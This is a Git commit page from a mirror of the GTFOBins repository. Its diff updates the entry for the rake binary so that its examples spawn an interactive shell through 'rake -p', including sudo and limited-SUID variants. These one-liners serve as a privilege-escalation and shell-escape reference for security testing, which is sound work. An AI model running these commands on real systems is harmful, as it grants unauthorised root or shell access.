1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00

Upgrade rake to proper interactive shell

This commit is contained in:
Andrea Cardaci 2020-03-17 20:05:53 +01:00
parent 9956127653
commit 5decf3493a

View File

@ -1,7 +1,9 @@
---
functions:
command:
- code: rake -p '`/usr/bin/id`'
shell:
- code: rake -p '`/bin/sh 1>&0`'
sudo:
- code: sudo rake -p '`/usr/bin/id`'
- code: sudo rake -p '`/bin/sh 1>&0`'
limited-suid:
- code: ./rake -p '`/bin/sh 1>&0`'
---